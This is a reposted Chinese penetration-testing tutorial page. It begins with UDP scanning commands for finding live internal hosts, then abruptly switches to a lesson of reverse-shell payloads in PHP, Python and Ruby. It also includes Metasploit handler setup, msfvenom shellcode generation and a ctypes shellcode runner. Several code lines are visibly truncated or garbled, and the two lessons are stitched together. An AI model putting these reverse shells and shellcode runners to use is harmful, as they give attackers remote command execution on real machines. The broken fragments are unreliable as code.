专注 APT 攻击与防御—基于UDP发现内网存活主机

2024-05-07 22:12

本文主要是介绍专注 APT 攻击与防御—基于UDP发现内网存活主机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

UDP简介:

UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。

UDP显著特性:

  1. UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。

  2. UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。

  3. UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报

  4. UDP 支持多播和广播。

1、nmap扫描

 
  1. root@John:~# nmap -sU -T5 -sV --max-retries 1 192.168.1.100 -p 500

慢的令人发指

第十二课:基于UDP发现内网存活主机 - 图1

2、msf扫描

 
  1. msf > use auxiliary/scanner/discovery/udp_probe

第十二课:基于UDP发现内网存活主机 - 图2

 
  1. msf > use auxiliary/scanner/discovery/udp_sweep

第十二课:基于UDP发现内网存活主机 - 图3

3、unicornscan扫描

linux下使用推荐

 
  1. root@John:~# unicornscan -mU 192.168.1.100

第十二课:基于UDP发现内网存活主机 - 图4

4、ScanLine扫描

项目地址:
Download and Install our Award Winning Products | McAfee
网盘地址:
百度网盘-链接不存在
密码:hvyx

McAfee出品,win下使用推荐。管理员执行。
 

第十二课:基于UDP发现内网存活主机 - 图5

第十二课:基于UDP发现内网存活主机 - 图6

1、php-payload

 
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LHOST 192.168.1.107
  5. LHOST => 192.168.1.107
 
  1. <?
  2. php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) {
  3. {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_
  4. strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s;
  5. $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s
  6. >

第十四课:基于第十课补充payload1 - 图1

 
  1. <?php
  2. $sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3");
  3. ?>

第十四课:基于第十课补充payload1 - 图2

2、python-payload

 
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LHOST 192.168.1.107
  5. LHOST => 192.168.1.107
 
  1. import socket,struct,time
  2. for x in range(10):
  3. try:
  4. s=socket.socket(2,socket.SOCK_STREAM)
  5. s.connect(('x.x.x.x',xx))
  6. break
  7. except:
  8. time.sleep(5) l=struct.unpack('>I',s.recv(4))[0]
  9. d=s.recv(l)
  10. while len(d)<l:
  11. d+=s.recv(l-len(d))
  12. exec(d,{'s':s})

第十四课:基于第十课补充payload1 - 图3

 
  1. import socket,subprocess,os;
  2. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",xx));
  3. i"]);

第十四课:基于第十课补充payload1 - 图4

 
  1. import socket import subprocess
  2. s=socket.socket()
  3. s.connect(("xx.xx.xx.xx",xx))
  4. while 1:
  5. p = subprocess.Popen(s.recv(1024),
  6. shell=True,
  7. stdout=subprocess.PIPE,
  8. stderr=subprocess.PIPE,
  9. stdin=subprocess.send(p.stdout.read() + p.stderr.read()
  10. )

第十四课:基于第十课补充payload1 - 图5

删除特征:

 
  1. root@John:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'

第十四课:基于第十课补充payload1 - 图6

 
  1. from ctypes import *
  2. reverse_shell = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72
  3. micropoorshell = create_string_buffer(reverse_shell, len(reverse_shell))
  4. shellcode = cast(micropoorshell, CFUNCTYPE(c_void_p))
  5. shellcode()

2、ruby-payload

 
  1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx", x);$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdi
  2. (IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil}

第十四课:基于第十课补充payload1 - 图7

 
  1. require 'socket';f=TCPSocket.open("xx.xx.xx.xx",xx).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

第十四课:基于第十课补充payload1 - 图8

 
  1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx","xx");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end

第十四课:基于第十课补充payload1 - 图9

 
  1. c=TCPSocket.new("xx.xx.xx.xx","xx");while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print
  2. io.read}end

第十四课:基于第十课补充payload1 - 图10

文章来源:《专注 APT 攻击与防御 - Micro8 系列教程》 - 书栈网 · BookStack

这篇关于专注 APT 攻击与防御—基于UDP发现内网存活主机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/968533

相关文章

【杂记-浅谈DHCP动态主机配置协议】

DHCP动态主机配置协议 一、DHCP概述1、定义2、作用3、报文类型 二、DHCP的工作原理三、DHCP服务器的配置和管理 一、DHCP概述 1、定义 DHCP,Dynamic Host Configuration Protocol,动态主机配置协议,是一种网络协议,主要用于在IP网络中自动分配和管理IP地址以及其他网络配置参数。 2、作用 DHCP允许计算机和其他设备通

编译测试后出现“发现不明确的匹配”错误

原文链接:http://blog.163.com/zhaoyanping_1125/blog/static/201329153201204218533/ 错误提示: 【“/”应用程序中的服务器错误。  分析器错误 说明: 在分析向此请求提供服务所需资源时出错。请检查下列特定分析错误详细信息并适当地修改源文件。  分析器错误信息: 发现不明确的匹配。】   这个问题发生原因一般情况是

[Spring Boot]Netty-UDP客户端

文章目录 简述Netty-UDP集成pom引入ClientHandler调用 消息发送与接收在线UDP服务系统调用 简述 最近在一些场景中需要使用UDP客户端进行,所以开始集成新的东西。本文集成了一个基于netty的SpringBoot的简单的应用场景。 Netty-UDP集成 pom引入 <!-- netty --><dependency><group

网络攻击有哪些新兴的威胁和防御策略

最新网络攻击威胁 近期,网络攻击的威胁呈现出新的趋势和特点。DDoS攻击仍然是一种严重的威胁,其次数和规模在过去一年中显著增长,攻击者技术不断升级,攻击成本逐渐降低。此外,攻击者的手段越来越多样化,包括传统的UDP flood攻击到更复杂的TCP反射、SYN小包等新型攻击手法。攻击目标也趋向于具有针对性,金融、互联网、医疗保健等关键领域成为攻击的重灾区。 防御策略 面对这些新的网络攻击威胁,

ESP32作为ModbusRTU主机读取从机数据

简介 ESP32 作为 ModbusRTU主机读取从机的数据,使用ESP32的串口2实现 代码改造 在 mb_master 的例程上修改 修改工程配置,将modbus模式修改成 RTU 模式,其他设置保持默认. demo工程解析 程序运行时读取以下寄存器: 保持寄存器 从寄存器0开始 读取6个寄存器保持寄存器 从寄存器10开始 读取58个寄存器,如果寄存器的内容不是0xAAAA,则将0x

模拟木马程序自动运行:Linux下的隐蔽攻击技术

模拟木马程序自动运行:Linux下的隐蔽攻击技术 在网络安全领域,木马程序是一种常见的恶意软件,它能够悄无声息地在受害者的系统中建立后门,为攻击者提供远程访问权限。本文将探讨攻击者如何在Linux系统中模拟木马程序的自动运行,以及他们可能使用的技术手段。 木马自动运行的常见方法 攻击者通常会使用以下几种方法来确保木马在Linux系统中自动运行: 计划任务(Crontab): 攻击者可以通

DDos学习——CC攻击(一)

本文主要记录DDoS攻击中的CC攻击。CC攻击又可以分为代理CC攻击和肉鸡CC攻击。 (1)代理CC攻击是黑客借助代理服务器生成指向受害主机的合法网页请求,实现DDoS和伪装     (2)肉鸡CC攻击是黑客使用CC攻击软件,控制大量肉鸡,发动攻击,相比来后者比前者更难防御。因为肉鸡可以模拟正常用户访问网站的请求。伪造成合法数据包。     CC(challenge Collapsar,挑战

XSS跨站攻击漏洞

XSS跨站攻击漏洞 一 概述 1 XSS概述 xss全称为:Cross Site Scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,XSS就是让攻击者的JavaScript代码在受害者的浏览器上执行。 XSS攻击者的目的就是寻找具有XSS漏洞的网页,让受害者在不知情的情况下,在有XSS漏洞的网页上执行攻击者的JavaScript代码。 XSS是提前埋伏好

服务器防御ddos攻击

硬件层面: 1、高性能防火墙能有效过滤ddos攻击,可以有效的提高网络的抗攻击能力 2、使用流量清洗设备(或者ddos防护设备)可以过滤攻击流量,可以保护网站和服务器正常运行 软件层面: 1、 隐藏服务器真实IP 2、 隐藏源站 3、 增加源服务器防御性能 4、 配置IP黑名单(这种方法不太实用,不保证绝对,但凡你能查出的IP好多都是傀儡或者假IP,因为IP会自动变不是固定 的) 5、 把服务器没

TCP与UDP_三次握手_四次挥手

TCP vs UDP TCP数据 具体可以通过Cisco Packet Tracer工具查看: UDP数据 三次握手、四次挥手 为什么是3/4次?这牵扯到单工、双工通信的问题 TCP建立连接:表白 TCP释放连接:分手 TCP—建立连接—三次握手 解释: 首先,启动服务器,让服务器进入监听状态(监听客户端的连接请求)。客户端向服务器发送同